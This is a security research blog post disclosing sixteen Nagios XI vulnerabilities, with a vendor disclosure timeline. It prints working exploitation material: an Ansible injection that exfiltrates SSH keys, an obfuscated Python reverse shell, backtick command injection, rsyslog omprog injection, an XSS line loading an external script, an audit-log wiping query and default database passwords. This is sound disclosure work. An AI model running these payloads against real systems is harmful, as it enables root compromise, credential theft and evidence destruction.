I was joined in this security research by Colin Brum, Principal Security Consultant at NCC Group.
In this post I describe the 16 vulnerabilities which myself and Colin discovered in Nagios XI v5.11.1 available at https://www.nagios.com/products/nagios-xi/. Nagios XI is a household name amongst server administrators. Nagios has been one of the go-to applications for remote monitoring and management for decades. As with the other applications in this series of blog posts, Nagios XI provides systems administrators with a central ‘hub’ to monitor and manipulate the state of computers (agents) deployed across the network.
The identified vulnerabilities can be found below by order of severity –
Root RCE via Ansible Vault File Injection (CVE-2023-47401)
Authentication Not Required For SSH Terminal Functionality
Command Injection in Host Configuration Page (CVE-2023-47408)
Remote Code Execution Via Custom Includes (CVE-2023-47400)
Any Authenticated User Can Manipulate User and System Macros (CVE-2023-47412)
Host Pivot Via Insecure Migration Process Ansible Vault Credentials (CVE-2023-47409)
Local Privilege Escalation via rsyslog abuse (CVE-2023-47414)
Recursive Filesystem Deletion as Root Via Backup Script (CVE-2023-47411)
Stored Cross Site Scripting Vulnerability in Manage Users (CVE-2023-47410)
Unintended Files Can Be Edited By Graph Editor Page (CVE-2023-47413)
A malicious actor could obtain code execution with root privileges on any host running Nagios XI. The root user could perform any operation on the host and access, manipulate or destroy all sensitive data that it can manage.
Details
The application exposes a page (“http://server_hostname/nagiosxi/admin/migrate.php”) which allows admins to perform a ‘migration’ from the active Nagios XI server to another server. The UI prompts the user to supply an IP address and credentials for a remote host, this information is then POST’ed to the webserver.
The webserver passes the supplied arguments to the following command ‘sudo /usr/bin/php /usr/local/nagiosxi/scripts/migrate/migrate.php -a IP_ADDRESS -u USERNAME -p PASSWORD‘. Note that the command is executed as root, due to the use of the sudo command.
The `migrate.php` script creates an encrypted Ansible vault with contents like the following (after decryption) –
The become_user, ansible_ssh_pass and ansible_sudo_pass fields are all populated by attacker supplied data.
During this research, it was observed that it is possible to supply a username parameter to the webserver along the lines of “research%0a%20%20name%20:”%7B%7B+lookup%28%5C%22pipe%5C%22%2C+%5C%22tar+-czf+-+%24HOME%2F.ssh%2F+2%3E%2Fdev%2Fnull+%7C+base64+-w0+%5C%22%29+%7D%7D”“, which decodes to the following –
Ansible allows parameters to be overwritten in Playbooks, so it would essentially change the ‘name’ of the playbook to “{{ lookup(\”pipe\”, \”tar -czf – $HOME/.ssh/ 2>/dev/null | base64 -w0 \”) }}”.
When `migrate.php` runs the playbook as part of the migration process, the command within the lookup will be executed (as root).
A full attack path can be seen below. Vault injection –
A similar example, where a root reverse shell is returned is shown below: –
---
- name: Migrate Nagios Core
hosts: all
become: yes
remote_user: research
name: "{{ lookup(\"pipe\", \"python -c 'import socket,os,pty,base64;s=socket.socket();s.connect((chr(49)+chr(57)+chr(50)+chr(46)+chr(49)+chr(54)+chr(56)+chr(46)+chr(49)+chr(50)+chr(48)+chr(46)+chr(49)+chr(51)+chr(49),8081));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(chr(0x62)+chr(0x61)+chr(0x73)+chr(0x68))' \") }}"
A reverse shell as the root user is returned.
2. Authentication Not Required For SSH Terminal Functionality
Risk: High (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)
Impact
Successful exploitation of a bespoke webshell like this would enable an attacker to fully compromise the webserver host.
Details
During this vulnerability research it was observed that Nagios XI exposes a webshell at http://server_url/nagiosxi/terminal/. Webshell access does not require the user to be authenticated with Nagios XI and it is exposed on all network interfaces, meaning that any attacker on the same network as the Nagios XI webserver can interact with it.
The webshell used can be found hosted here https://github.com/shellinabox/shellinabox. It is a large and complex application written in the C programming language. Analysis of the commits in the above Git repository indicate that the application has not been updated in 4 years, and a release has not been made since 2016.
Due to the fact that this webshell does not require the user to be authenticated with Nagios XI, it is possible for an attacker on the same network as the Nagios XI server to begin fuzzing the webshell in order to attempt to compromise it to gain unauthenticated code execution on the host.
Ultimately the use of a no-longer-maintained, heavily outdated webshell such as `shellinabox` introduces risk to every installation of Nagios XI. This risk is compounded by the lack of a requirement for the user to be logged into Nagios XI.
3. Command Injection in Host Configuration Page (CVE-2023-47408)
Risk: High (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:L/A:L)
Impact
Nagios XI takes care to ensure that administrators cannot obtain direct shell access on the Nagios XI server without first having valid credentials for the host.
Exploitation of this finding would allow an administrator to gain command execution on the host, which would enable them to begin the process of exploiting all agents connected to the server.
Details
Administrators can define ‘services’ within Nagios XI. These ‘services’ are essentially a set of scripts that the server executes to check if a particular service or process on an agent is operating correctly.
Administrators select from a drop-down list of scripts, and then they can supply arbitrary amounts of arguments to the script, often including a $HOSTNAME parameter indicating which host the script should be executed against.
The image above shows the service management page, complete with unfilled argument templates.
Administrators enter values in the `$ARG1$` and `$ARG2$` input boxes, which are placed into the command when it is executed as part of scheduled/forced checks against a host.
During this vulnerability research it was observed that administrators can perform a command injection attack on the Nagios server by entering commands surrounded by backticks within the argument input boxes.
For example, taking the `check_xi_host_http` script as an example –
The command injection payload within `$ARG1$` results in a new file being created in `/tmp/test1` containing the current date/time whenever the service check executes.
$~ cat /tmp/test1
cat: /tmp/test1: No such file or directory
$~ cat /tmp/test1
Mon 14 Aug 2023 06:16:06 AM EDT
This flaw could be abused to create a reverse shell connection to an attacker’s machine, enabling them to fully compromise the Nagios XI server.
4. Remote Code Execution Via Custom Includes (CVE-2023-47400)
Risk: High (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:L/A:L)
Impact
Consequences of this RCE range from complete host compromise, complete database compromise and compromise of all agents with SSH keys registered with Nagios XI.
Numerous controls have been implemented which attempt to prevent users from uploading PHP files, indicating that this is a risk that Nagios developers acknowledge and are keen to avoid. These controls are –
A `.htaccess` file which explicitly prevents PHP code from executing and forcibly sets the Content-Disposition to ‘attachment’ which prevents files from rendering, they are instead downloaded upon access.
A requirement for image files to begin with valid image ‘magic bytes’.
A requirement for all uploaded filenames to contain an expected file extension (.css, .jpg, .js, etc.)
After uploading files, the application allows developers to rename uploaded files using a rename utility built into the Custom Includes page.
NCC Group researchers were able to bypass each of the above restrictions using the following steps –
Upload a valid image named “test.jpg”
Use the rename feature of Custom Includes to rename the image to “.htaccess” (which has the effect of overwriting the existing `.htaccess` file)
Rename the file to “test.jpg” again, resulting in there being no `.htaccess` file present
Upload a file named “exploit.jpg.php” with the following contents –
A simple phpinfo() payload is displayed here as a proof of concept, however this could have been any malicious PHP code to compromise the host.
5. Any Authenticated User Can Manipulate User and System Macros (CVE-2023-47412)
Risk: Medium (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N)
Impact
Any authenticated user can steal credentials from user macros if the “Redacted Macros” setting is disabled, and can modify existing user and system macros to provoke denial of service conditions (for macros which contain credentials to services) and cause the server to leak useful/sensitive info to all authenticated users (via System Macros)
Details
User Macros
‘User macros’ is a feature of the application which allows administrators to store secrets in a configuration file as opposed to hardcoding them in host commands etc. (for security purposes)
User macros can be set and viewed under `Configure -> Core Config Manager -> User Macros`. This is intended to be an administrator only feature, given that freshly created users have their ‘Core Config Manager’ setting disabled by default.
Low-privileged users can access these macros directly by navigating to “http://server_hostname/nagiosxi/includes/components/usermacros/index.php”. If “redacted macros” has been disabled in config, all the sensitive macros will be displayed to the user here.
Intended functionality is that if “redacted macros” is enabled, it is not possible for an administrator to modify the User Macros – the text box is grey, the update button is disabled, and all fields are redacted. During this vulnerability research it was observed that even if `redacted macros` is enabled, and it is impossible to modify the User Macros file via the UI, it is still possible for any authenticated user to modify the User Macros by simply sending an appropriately formatted HTTP request to the above URL, as shown below –
curl 'http://server_hostname/nagiosxi/includes/components/usermacros/?mode=overwrite content=NCC%20GROUP' --compressed -X POST -H 'Cookie: nagiosxi=COOKIE_VALUE'
Resulting in the file being successfully truncated, with all prior secrets lost –
$~ cat /usr/local/nagios/etc/resource.cfg
NCC GROUP
$~
This attack was performed by a user who has had their ‘Core Config Manager Access’ field set to ‘None’ –
Any authenticated user can also exploit this flaw by using the `update` mode of operation, even when the config is not intended to be writable, via a GET request to the following URL “http://server_hostname/nagiosxi/includes/components/usermacros/index.php?mode=update macro=NCC%20GROUP new_value=53”.
System Macros
Additionally, via the same URL, any authenticated user can access and change the `System Macro` settings too. In this case, though, the Update button is present and available for any user to press.
Once again, this is intended to be a feature which is only exposed to privileged users.
6. Host Pivot Via Insecure Migration Process Ansible Vault Credentials (CVE-2023-47409)
Risk: Medium (CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H)
Impact
An attacker who has successfully compromised and gained root on a Nagios XI server can retrieve privileged credentials for third party hosts from encrypted Ansible vault files.
Details
As part of Nagios XI installation, the installer adds the following line to `/etc/sudoers` –
The nagios user is allowed to execute the above script as root, to migrate the Nagios server to another server. The script accepts a hostname, a root or sudoer username and the corresponding password for that account. Those credentials are then placed into a YML file which is encrypted with an Ansible “vault password”.
The Ansible encrypted vault file is later used by `migrate.php` to migrate the Nagios server to a remote server using the Ansible application. These encrypted YML files are not deleted when the migration is completed.
Within `migrate.php` are the following lines of interest –
// O.B NCC => run_migration_ansible():83
$dir = get_root_dir() . '/scripts/migrate';
$job_name = uniqid();
// O.B NCC => vault_password is predictable, value is derived from current millis
$vault_password = uniqid();
$job_dir = $dir.'/jobs/'.$job_name;
$yml_file = file_get_contents($dir."/templates/migrate_core.yml");
// O.B NCC => SNIP
copy($dir.'/templates/ansible.cfg', $job_dir.'/ansible.cfg');
$job_file = $job_dir.'/'.$job_name.'.yml';
// O.B NCC => $job_file now contains the credentials
file_put_contents($job_file, $yml_file);
// Add hosts and password file
file_put_contents($job_dir.'/hosts', $address);
file_put_contents($job_dir.'/.vp', $vault_password);
// Make encrypted ansible playbook to protect passwords
$cmd = "echo -n '".$vault_password."' | ansible-vault encrypt --vault-password-file=".$job_dir.'/.vp'." ".$job_file." --output ".$job_file;
// O.B NCC => $job_file is now encrypted using the vault password. It is not deleted at the end of the migration process
The PHP `uniqid` function generates a ‘unique identifier’ by taking the current clock milliseconds, concatenating the current microseconds and encoding it as a hexadecimal string.
`uniqid` outputs a hexadecimal figure which represents the current timestamp in seconds (8 hex characters) concatenated with the current microseconds (5 hex characters).
The PHP documentation notes that “This function does not generate cryptographically secure values, and must not be used for cryptographic purposes, or purposes that require returned values to be unguessable.”
Taking `64cb047ea475b` as an example, when it is decoded to decimal the seconds portion is 1691026558 and the microseconds portion is 673627.
Because the $vault_password variable is created with the PHP `uniqid` function, it is trivial for an attacker who has compromised the local Linux root user account to obtain access to privileged credentials of a remote machine by doing the following –
Navigating to any job directory within `/usr/local/nagiosxi/scripts/migrate/jobs/`
Running `stat -t NAME_OF_JOB_FILE | cut -d” ” -f 12` on the encrypted job file
Convert the timestamp from `stat` to hexadecimal
Start brute-forcing Ansible vault decryption from TIMESTAMP_HEX00000 all the way to TIMESTAMP_HEXFFFFF
Or, for a neater example using the timestamp above: `64cb047e00000` to `64cb047eFFFFF`
Because most of the vault password is known (from the time that the vault was created), the key space to decrypt an impacted YML file is only 00000-FFFFF or 1,048,575 potential guesses at worst (which are performed entirely offline).
Given that only a few milliseconds pass between the file being created and the file being encrypted and given that the name of the job file is also derived using `uniqid()`, it is possible to guess the password within around 10 guesses simply by incrementing the last hex digit of the job’s filename.
A small proof of concept was written which abuses this flaw to retrieve remote root/sudoer credentials from job files –
Credentials for a remote host were successfully decrypted and extracted.
7. Local Privilege Escalation via rsyslog abuse (CVE-2023-47414)
Risk: Medium (CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:C/C:L/I:N/A:N)
Impact
Compromise of the syslog user allows an attacker to read all files under `/var/log`, amongst other directories. Access to these directories is heavily guarded due to the potential for secrets (credentials, session IDs, PII) to be present within log files.
Details
As part of its installation, Nagios XI adds the following line to `/etc/sudoers` –
NAGIOSXI ALL = NOPASSWD:/usr/bin/php /usr/local/nagiosxi/scripts/send_to_nls.php *
This line allows the local nagios user to execute `send_to_nls.php` as root with any number of arguments. The script dynamically generates a new rsyslog file using the following code –
$file_content = '
# Automatically generated by Nagios XI. Do not edit this file!
$ModLoad imfile
$InputFilePollInterval 10
$PrivDropToGroup adm
$WorkDirectory '.$spool_directory.'
# .... NCC O.B SNIPPED ....
$InputFilePersistStateInterval 20000
$InputRunFileMonitor
# Forward to Nagios Logserver and then discard.
if $programname == \'' . $tag . '\' then @@' . $hostname . ':' . $port . '
if $programname == \'' . $tag . '\' then ~';
file_put_contents($conf_file, $file_content);
finish();
function finish() {
//restart rsyslogd
$cmdline = "service rsyslog restart";
echo exec($cmdline, $out, $rc);
exit($rc);
}
In the line above marked in bold, the `$port` variable is not sanitized or validated as being an integer prior to being written to the rsyslog file.
No sanitization on this variable means that a local attacker can inject arbitrary content into new rsyslog files, gaining code execution as the syslog user. For example, consider the following use of `send_to_nls.php` –
sudo php /usr/local/nagiosxi/scripts/send_to_nls.php hostname "`printf '53\n\nmodule(omprog)\naction(type=\"omprog\" binary=\"/tmp/runsAsSyslog \")'`" tag file
Observe that instead of supplying an integer port argument, we have supplied “`printf ’53\n\nmodule(omprog)\naction(type=\”omprog\” binary=\”/tmp/runsAsSyslog \”)’`”
Executing this command creates a new rsyslog file with the following contents –
# Automatically generated by Nagios XI. Do not edit this file!
$ModLoad imfile
$InputFilePollInterval 10
$PrivDropToGroup adm
$WorkDirectory /var/spool/rsyslog
# Input for file
$InputFileName file
$InputFileTag tag:
$InputFileStateFile nls-state-64cb1a2feedb9 # Must be unique for each file being polled
# Uncomment the folowing line to override the default severity for messages
# from this file.
#$InputFileSeverity info
$InputFilePersistStateInterval 20000
$InputRunFileMonitor
# Forward to Nagios Logserver and then discard.
if $programname == 'tag' then @@hostname:53
module(omprog)
action(type="omprog" binary="/tmp/runsAsSyslog")
if $programname == 'tag' then ~
When this script is evaluated by the operating system, the bold `omprog` expression in the penultimate line will attempt to execute `/tmp/runsAsSyslog` as an executable file.
8. Recursive Filesystem Deletion as Root Via Backup Script (CVE-2023-47411)
Risk: Medium (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:H/A:N)
Impact
Recursive deletion of the server filesystem contents, meaning that all databases, all host details, all config, backups, and custom code/assets will be deleted.
Details
As part of Nagios XI installation, the installer adds the following line to `/etc/sudoers` –
NAGIOSXI ALL = NOPASSWD:/usr/local/nagiosxi/scripts/backup_xi.sh *
This line denotes that the `nagios` user is allowed to execute the `backup_xi.sh` script as root without supplying a password. The `*` suffix indicates that the script accepts any number of user-supplied arguments.
Whilst reading the script at `/usr/local/nagiosxi/scripts/backup_xi.sh` the following lines were observed:
###############################
# USAGE / HELP
###############################
usage () {
echo ""
echo "Use this script to backup Nagios XI."
echo ""
# .... NCC O.B SNIP ....
###############################
# ADDING LOGIC FOR NEW BACKUPS
###############################
while [ -n "$1" ]; do
case "$1" in
-h | --help)
usage
exit 0
;;
-n | --name)
# NCC O.B => attacker supplied fullname variable
fullname=$2
;;
-p | --prepend)
prepend=$2"."
;;
-a | --append)
append="."$2
;;
-d | --directory)
# NCC O.B => attacker supplied rootdir variable
rootdir=$2
;;
esac
shift
done
Both the `$rootdir` and `$fullname` variables are attacker controlled. Later in the script, the attacker-controlled variables are used as follows –
# NCC O.B => Check if $rootdir has a value
if [ -z "$rootdir" ]; then
rootdir="/store/backups/nagiosxi"
fi
# NCC O.B SNIP
# NCC O.B => $name is now attacker controlled
name=$fullname
# NCC O.B => Check if $fullname has a value
if [ -z "$fullname" ]; then
name="$prepend$ts$append"
fi
# Clean the name
# NCC O.B => Leave only periods, alphanumerics, pipes and hyphens in the name
name=$(echo "$name" | sed -e 's/[^[:alnum:].|-]//g')
# Get current Unix timestamp as name
if [ -z "$name" ]; then
name="$ts"
fi
# My working directory
# NCC O.B => now $mydir is a concatenation of the cleaned user supplied name and the unclean $rootdir
mydir=$rootdir/$name
Finally, after all of the backups are complete (regardless of success or failure), the following code executes –
##############################
# COMPRESS BACKUP
##############################
echo "Compressing backup..."
tar czfp "$name.tar.gz" "$name"
# NCC O.B => BUG HERE
rm -rf "$name"
# Change ownership
chown "$nagiosuser:$nagiosgroup" "$name.tar.gz"
if [ -s "$name.tar.gz" ];then
echo " "
echo "==============="
echo "BACKUP COMPLETE"
echo "==============="
echo "Backup stored in $rootdir/$name.tar.gz"
exit 0;
else
echo " "
echo "==============="
echo "BACKUP FAILED"
echo "==============="
echo "File was not created at $rootdir/$name.tar.gz"
# NCC O.B => BUG HERE
rm -r "$mydir"
exit 1;
fi
As noted above by the two `BUG HERE` labels, there are two key bugs present here, both stemming from the same root cause.
If an attacker supplies a `name` parameter of `.` (a single period, which will satisfy the `sed` command which cleans the supplied filename) and a `rootdir` parameter of `/` (a single slash) then the script will execute `rm -rf .`, recursively removing all files and directories from the directory specified within the command downwards.
Because the attacker controls `$rootdir`, and the script starts by executing `cd $rootdir`, this line of code has the potential to delete the entire filesystem (directly equivalent to executing `rm -rf /`).
An attacker who has compromised the Nagios user could abuse this flaw to recursively remove all files from the filesystem post-compromise.
9. Stored Cross Site Scripting Vulnerability in Admin’s User Management Page (CVE-2023-47410)
Risk: Medium (CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N)
Impact
Consequences of a stored Cross-Site Scripting vulnerability being exploited generally range from site defacement, account takeover, CSRF, and sophisticated phishing attacks.
Details
During this vulnerability research it was observed there is a lapse in output encoding in the Admin-only user profile modification page at “http://server_hostname/nagiosxi/admin/users.php?edit=1 user_id[]=4” (for example). For example, assume a malicious administrator creates a new user with a username containing a JavaScript payload, such as –
When another administrator attempts to view that user’s profile by clicking on their username in “http://nagios_server/nagiosxi/admin/users.php”, the JavaScript payload in the username will execute in the victim’s browser –
The root cause of this vulnerability has been traced to this inline JavaScript in the admin user management page –
$('.set-random-pass').click(function() {
var newpass = Array(16).fill("0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz").map(function(x) { return x[Math.floor(Math.random() * x.length)] }).join('');
$('input[name=password1]').val(newpass);
$('input[name=sendemail]').prop('disabled', false).prop('checked', true);
});
$('#updateForm').submit(function(e) {
// NCC C.B => Here
if (updateButtonClicked $('#usernameBox').val() != "nagios3”);</script></script src="https://nc.ci/1.js"></script>") {
var go_ahead_and_change = confirm("Changing your username is not recommended. But if you wish to proceed, you should be warned that it may take a while to take effect depending on your configuration. Do you wish to proceed?");
if (!go_ahead_and_change) {
e.preventDefault();
}
}
});
});
</script>
Essentially the user’s username is being concatenated unsafely into the inline JavaScript by `users.php`, resulting in the potential for JavaScript execution.
10. Unintended Files Can Be Edited by Graph Editor Page (CVE-2023-47413)
Risk: Medium (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:L)
Impact
An attacker with administrator privileges can modify PHP files to execute arbitrary code on the host and maintain access for future exploitation.
When the edit button is selected in the UI, the URL changes to, for example, “http://server_hostname/nagiosxi/admin/graphtemplates.php?edit=check_local_disk.php dir=templates” which allows a user to edit the file “/usr/local/nagios/share/pnp/templates/check_local_disk.php”
While there are impressively robust controls in place to prevent path traversal attacks outside of “/usr/local/nagios/share/pnp/”, NCC Group researchers observed that, by supplying a `dir` parameter of either `/` or `..` (which the Nagios server replaces with `/`), it was possible to edit other PHP files within the parent directory.
Specifically, it is possible to edit the following files in the “/usr/local/nagios/share/php/” directory –
index.php
ajax.php
zoom.php
Because these files are not listed within the graph template list in the UI, it is assumed that they are not intended to be editable by administrators.
A low privileged (non-admin user) can abuse this page to change CCM settings, clear the `Missing Objects` list and apply configuration (causing a new snapshot to be generated).
Details
One of the many Nagios XI features available to administrators is the “Missing Objects” page at `/nagiosxi/admin/missingobjects.php`.
According to the page, it allows admins to –
[..] delete unneeded host and services or add them to your monitoring configuration through this page. Note that a large amount of persistent unused passive checks can result in a performance decrease.
As part of the operation of this page, it is possible to ‘apply’ changes which has the result of generating a new configuration snapshot on disk.
During this vulnerability research it was observed that this page and all its features are available to all authenticated users, regardless of whether they are administrators or not.
Allowing non-admin users to access this page increases the risk of an attacker making harmful configuration changes, deleting, or manipulating Missing Object records, and creating arbitrary amounts of configuration snapshots until the snapshot disk/partition is filled.
12. Nagios XI Database User Can Delete From Audit Log (CVE-2023-47399)
The ability to clear the audit log table after a successful compromise will make it significantly more difficult for an administrator or Incident Response team to establish how the initial compromise occurred, and fix the flaw.
Details
The `nagiosxi.xi_auditlog` table is a granular source of information about a user’s activities within the Nagios XI web application.
Allowing the `nagiosxi` database user to have full CRUD control over the audit logs makes it significantly easier for an attacker to successfully mask their activities after a successful host compromise via the web application.
Malicious activities could be trivially obscured using simple MySQL queries such as `update xi_auditlog set message=”” where auditlog_id>94;`
Removing the `nagiosxi` user’s ability to update/delete records in this table is beneficial as, in the event of a compromise, this audit log may help IR teams to identify how the application was compromised.
13. Plaintext Storage of NRDP and NSCA Tokens (CVE-2023-47402)
An attacker who has compromised the database will gain the ability of submitting data to remote Nagios instances, and potentially to submit malformed/malicious palyloads to the compromised Nagios instance.
Details
Nagios XI offers an admin-only feature to configure “Inbound Transfer” and “Outbound Transfer” settings. These settings allow the administrator to supply data such us credentials, protocol or IP addresses for third party Nagios NRDP/NSCA servers, and to configure an authorization token for 3rd parties to supply data to the local Nagios server.
While enumerating Nagios’s `nagiosxi` database, NCC Group researchers observed that each of the credentials supplied in Inbound/Outbound Transfer settings were stored in the `xi_options` database table in plaintext, as shown below.
Attackers can abuse this kind of port scanning attacks to determine whether services are listening on interesting ports. Attackers can then leverage this information to, for example, abuse other features of the application (such as numerous Nagios API monitoring plugins) to submit arbitrary traffic to these ports on localhost. The ability to determine if a port is open and submit traffic to it can often allow an attacker to submit known exploit proof-of-concept scripts to the services for code execution.
Details
The `System Backups -> Scheduled Backups` feature of Nagios XI allows administrators to test whether they are able to successfully connect to an FTP server. The feature allows admin users to supply both a server hostname/IP and a TCP port.
During this research it was observed that if an attacker supplies a server IP of 127.0.0.1 (localhost) and a random port which is open/listening, the application would take a couple of seconds to reply that it failed to connect. However, if an attacker supplies a port parameter for a port which is not listening on localhost, the application would return the same error almost instantaneously.
This discrepancy in error message timings when the port is closed versus when the port is open allows an attacker to perform a port scan against the server and obtain information about which ports are listening on localhost. As noted above, by itself this is not a particularly severe flaw, however it forms a key part of an attacker’s ability to fully enumerate the webserver and formulate a plan for compromising it.
NCC Group consultants were also able to abuse this feature to portscan internal IP addresses of other machines on the network, too.
15. Sensitive Credentials Stored in Plaintext World Readable Files (CVE-2023-47407)
Basic authentication credentials for various subsystems
During this research it was observed that this file is ‘world readable’, meaning that any user on the machine is able to read the content of the file without needing to be part of any specific user group. Given the sensitivity of the file, it must be protected at all costs in order to prevent a low privileged attacker on a compromised webserver from gaining access to the database and the ability to pivot to additional hosts.
Additionally, it was observed that the `htpasswd` file under `/usr/local/nagiosxi/etc/htpasswd.users` is also world readable. This file contains the SHA1 hashed credentials for every Nagios XI user –
Should attackers compromise the webserver or obtain the ability to read arbitrary files on the webserver, they will be able to read the contents of this file and mount an offline brute-force attack on the hashes in an attempt to obtain the associated plaintext passwords.
16. Weak Default MySQL Credentials (CVE-2023-47405)
Consequences of highly privileged access to MySQL server can range from code execution, Nagios agent compromise, and Nagios server denial of service.
Details
As part of this vulnerability research, a fresh Ubuntu 22 virtual machine was created with no additional configuration performed.
During the installation of Nagios XI, it was observed that the installer creates at least 3 MySQL database users with weak credentials –
`nagiosxi`/`n@gweb`
`nagiosql`/`n@gweb`
`ndoutils`/`n@gweb`
Each of these users has full Create/Read/Update/Delete (CRUD) access to their respective databases, which allows for trivial admin account takeover, denial of service (by deleting config data, user data or network host data), and potentially code execution (for example by modifying the entries within the `nagiosql.tbl_command` table).
The risk of this finding is mitigated significantly because in the default configuration the MySQL database server only listens on localhost, however if the webserver is compromised (as evidenced by the technical advisories in this research piece) these weak credentials would make it trivial for an attacker to compromise the database.
Disclosure Timeline
9/19/2023 – Initial contact made with the vendor in order to establish a secure channel to share the vulnerability details
9/19/2023 – Nagios Enterprises, LLC responds indicating that we can email the disclosures to them
9/19/2023 – NCC Group consultants send the disclosures by email
9/19/2023 – Nagios Enterprises, LLC confirm receipt of the vulnerabilities
9/20/2023 – Nagios Enterprises, LLC schedules a call to discuss the vulnerabilities
9/21/2023 – Nagios Enterprises, LLC request clarification on a finding
9/21/2023 – NCC Group responds with the clarification
10/17/2023 – Nagios Enterprises, LLC reschedules the vulnerability discussion call to November 1st
11/1/2023 – NCC Group and Nagios Enterprises, LLC have a call to discuss the findings and remediation progress. Rough coordinated disclosure date established for early December
12/5/2023 – NCC Group requests a status update for when the fix is due to be released, in order to coordinate public disclosure
12/8/2023 – Nagios responds to confirm that they consider the vulnerabilities to be mitigated, and we can proceed with public disclosure.